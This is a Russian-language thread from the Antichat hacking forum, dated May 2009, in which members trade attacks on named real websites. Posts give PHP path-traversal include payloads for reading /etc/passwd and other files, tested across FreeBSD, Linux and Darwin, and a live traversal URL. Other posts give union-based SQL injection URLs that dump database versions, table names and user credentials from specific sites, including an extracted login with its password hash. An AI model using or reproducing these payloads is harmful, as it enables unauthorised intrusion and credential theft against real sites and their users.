18.05.2009, 11:29
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
include('/usr/local/apachgo/testinclud/../../../../../etc/passwd');
Software: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635. PHP/5.2.9 работает
Software: Apache/2.2.3 (Debian) DAV/2 PHP/4.4.4-8+etch6 mod_ssl/2.2.3 OpenSSL/0.9.8c. PHP/4.4.4-8+etch6 работает
Software: Apache/1.3.37 (Unix) mod_perl/1.29 mod_ssl/2.8.28 OpenSSL/0.9.8d PHP/4.4.7
uname -a: SunOS jan 5.8 Generic_117350-54 sun4u работает
Software: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch6. PHP/4.4.4-8+etch6 работает
Software: Apache/2.0.63. PHP/5.2.6
uname -a: Linux raffles 2.6.18-6-686-bigmem #1 SMP Tue May 5 02:00:57 UTC 2009 i686 работает
в Большинстве случаев работает как раз
|
|
|
18.05.2009, 12:27
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Обсуждалось это, ну или примерно это вот тут :
https://forum.antichat.ru/showthread.php?t=98525
Сообщение от [Raz0r]
где existing_dir имя существующей папки
в некоторых версиях PHP (e.g. 5.1.2) на linux имя папки может быть любым
Вот пост по теме из той-же ветки
https://forum.antichat.ru/showpost.php?p=1024096&postcount=37
Сообщение от [Raz0r]
это относится к linux, хотя это понятие растяжимое ) на все том же FreeBSD 6.3, PHP 5.2.8 через несуществующую папку не инклудится =\
Сейчас провели несколько тестов , респект Qwazar и BlackSun
На лине везде работает (но это тесты, тоесть то, что было под рукой) , на фре работает вот так:
[13:05:49] <BlackSun> тобишь include("/asdasdasd/../../../../../../../../../../../../../../../../../../../usr/local/www/site.ru/www/docs/_vt_log/htaccess.php"); пашет
[13:05:52] <BlackSun> include("asdasdasd/../../../../../../../../../../../../../../../../../../../usr/local/www/site.ru/www/docs/_vt_log/htaccess.php"); - нет
Тоесть случай из примера не сработает
А вообще интересно, если у кого-то есть желание, пошарьтесь по шеллам, потестируйте. До конца зависимости так и не понятны
Последний раз редактировалось jokester; 18.05.2009 в 13:08..
|
|
|
|
18.05.2009, 12:20
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
http://art.specialradio.ru/index.php?id=-399+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9
может кто-то докавыряет дальше...
с этим можно что-то сделать?
http://www.telemultimedia.ru/news.php?id=2702'
Последний раз редактировалось AlexSatter; 18.05.2009 в 12:23..
|
|
|
|
18.05.2009, 12:34
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от AlexSatter
может кто-то докавыряет дальше...
Дальше это куда куда ?) Вот юзера форума
http://art.specialradio.ru/index.php?id=-399+union+select+1,concat_ws(0x2F,username,user_pa ssword),3,4,5,6,7,8,9+from+phpbb_users+limit+1,1
|
|
|
|
18.05.2009, 12:25
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
При передачи значения /../../../../lololo в переменную value сценарий попытается включить файл
config/../../../../lololo.php. Даже если расширение удастся отбросить нулбайтом или слешами, то в 90% случаев инклуд не пролезет если папки config не существует.
Хотя , я где-то читал, что при какой-то конфигурации PHP+Linux может пролезть и при несуществующей папке, но на практике не встречал. В винде будет работать на ура , независимо от наличия папки.
я сто раз встречал такую ситуацию)
|
|
|
|
18.05.2009, 12:38
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
FreeBSD
http://4ertim.com/autohtml.php?filename=ololololololo/../../../../../../../etc/passwd
|
|
|
|
18.05.2009, 12:55
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от Spyder
FreeBSD
http://4ertim.com/autohtml.php?filename=ololololololo/../../../../../../../etc/passwd
А если в сорцах путь относительный?
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
18.05.2009, 12:41
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
ElteRUS, спасибо
не посмотрел, что там форум пхпббешный стоит, поэтому и таблицу подобрать не смог  |
|
|
|
18.05.2009, 13:55
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
А вообще интересно, если у кого-то есть желание, пошарьтесь по шеллам, потестируйте. До конца зависимости так и не понятны
FreeBSD 6.3-RELEASE-p2
Код:
include('asd/../../../../../../../../../home/u*****/********/www/robots.txt');
include('/asd/../../../../../../../../../home/u*****/********/www/robots.txt');
Оба работают.
FreeBSD 6.4-RELEASE
Код:
include('/asd../../../../../../../../../usr/home/bla_bla_bla/.htaccess');
include('asd../../../../../../../../../usr/home/bla_bla_bla/.htaccess');
Оба работают.
Linux 2.6.24.4-nmm2
Код:
include('/asd../../../../../../www/htdocs/w*******/robots.txt');
include('asd../../../../../../www/htdocs/w*******/robots.txt');
Оба работают.
Linux 2.4.33.2
Код:
include('asdasd../../../../../../../../../../home/user/www/index.html');
include('/asdasd../../../../../../../../../../home/user/www/index.html');
Пашет только второй.
Darwin 9.7.0
Код:
include('/asdasd../../../../../../etc/passwd');
include('asdasd../../../../../../etc/passwd');
Оба работают.
Вечером приду домой может еще посмотрю.
|
|
|
|
18.05.2009, 18:48
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database())
вывод: 5.0.45:kitanaru@localhost:kitanaru
через infromation_schema.tables нашлось user_profile, два столбца: usuer_id и password.
Вывод значений не произошел. решил проверить, а есть ли в этой таблице записи?
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,count(*)+from+user_profile
Оказалось ноль..
затем нашел таблицу personal
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,psw)+fro m+personal+limit+0,1
ALLA:bee7a699d0bd762b85db6deaca1c5f40
всего три учетки... limit+1,1 и +limit+2,1
Последний раз редактировалось AlexSatter; 18.05.2009 в 18:56..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
